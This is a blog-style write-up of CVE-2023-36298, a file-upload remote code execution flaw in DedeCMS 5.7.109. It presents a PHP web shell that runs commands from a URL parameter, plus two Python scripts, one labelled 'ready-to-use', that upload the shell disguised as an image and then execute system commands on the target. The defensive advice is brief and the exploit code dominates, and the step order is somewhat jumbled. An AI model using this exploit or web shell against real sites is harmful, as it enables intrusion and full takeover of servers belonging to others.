DedeCMS is a popular open source content management system mostly used in Chinese-speaking regions. In its version 5.7.109, a critical security bug (CVE-2023-36298) allows attackers to upload malicious files and gain full control over the website—this is called a Remote Code Execution (RCE) vulnerability.
This long read shows you exactly how the flaw works, demonstrates the exploit with code samples, and explains how to protect your site. If you're running DedeCMS—or worried about vulnerable sites—read on.
What is the CVE-2023-36298 Vulnerability?
This vulnerability comes from weak checks in DedeCMS's file upload functionality. Attackers can upload files (like .php scripts), placing them in locations reachable by the web server. Once uploaded, they just visit the file URL in their browser, and the server executes their code. This can lead to:
Why Does It Happen?
The main problem is that DedeCMS's upload module doesn't properly validate file types and extensions. Attackers take advantage by naming files with double extensions or uppercase extensions (evil.php.jpg or EVIL.PHP), or by using crafted POST requests.
See the vulnerability announcement here
- GitHub Advisory
- Chinese PoC writeup
- Exploit DB Ref
Step-by-Step Exploit Details
Let's walk through a proof-of-concept for CVE-2023-36298, using both description and real code.
1. Find a File Upload Function
Usually, after logging in as an admin or user (but sometimes even unauthenticated), DedeCMS offers an image/file upload feature. The vulnerable endpoint is often something like:
/dede/dialog/select_images_post.php
Attackers create a simple PHP web shell. Here's an example (evil.php)
<?php system($_GET['cmd']); ?>
This shell allows running system commands via the cmd URL parameter.
No MIME-type verification.
Attackers often rename their PHP file to evil.jpg or evil.PHP.
A typical HTTP request to upload the file (using Python requests)
import requests
url = 'http://target.com/dede/dialog/select_images_post.php';
files = {'imgfile': ('evil.php', open('evil.php', 'rb'), 'image/jpeg')}
cookies = {'PHPSESSID': 'your-session-here'} # Only if authentication is needed
r = requests.post(url, files=files, cookies=cookies)
print(r.text)
If the upload is accepted, you'll see a server response with the image/file path.
Once the file is uploaded, just visit the file in your browser
http://target.com/uploads/allimg/202406/evil.php?cmd=whoami
If successful, the output of whoami will be visible, showing you have code execution.
Open the file upload page (admin or user portal).
2. Upload evil.php as if it were an image—try changing the file extension, content-type, or filename as described above.
Here is a ready-to-use proof of concept
import requests
url = 'http://target.com/dede/dialog/select_images_post.php';
# Update the session cookie if authentication is required
cookies = {'PHPSESSID': 'insert-valid-session-here'}
# Prepare the payload file
files = {'imgfile': ('evil.php', '<?php system($_GET["cmd"]);?>', 'image/jpeg')}
# Send the upload request
response = requests.post(url, files=files, cookies=cookies)
print("Server Response:\n", response.text)
# Assuming the script echoes back the file path, extract and use it,
# e.g.: /uploads/allimg/202406/evil.php
shell_url = 'http://target.com/uploads/allimg/202406/evil.php';
command = 'whoami' # Or any system command
exec_response = requests.get(shell_url, params={'cmd': command})
print("Command Output:\n", exec_response.text)
Update Immediately: If a patch or newer version is available, apply it.
- Restrict File Types: Only allow safe file extensions like .jpg, .png, and verify *server-side*.
`
# .htaccess in /uploads/
Deny from all
Conclusion
CVE-2023-36298 is a textbook example of a dangerous file upload vulnerability leading to remote code execution in DedeCMS v5.7.109. All site operators should patch or mitigate immediately.
References
- GitHub Issue
- Exploit-DB 51521
- Sina CSDN PoC (Chinese)
If you have any questions or need incident help, feel free to ask.
Timeline
Published on: 08/03/2023 15:15:00 UTC
Last modified on: 08/07/2023 13:06:00 UTC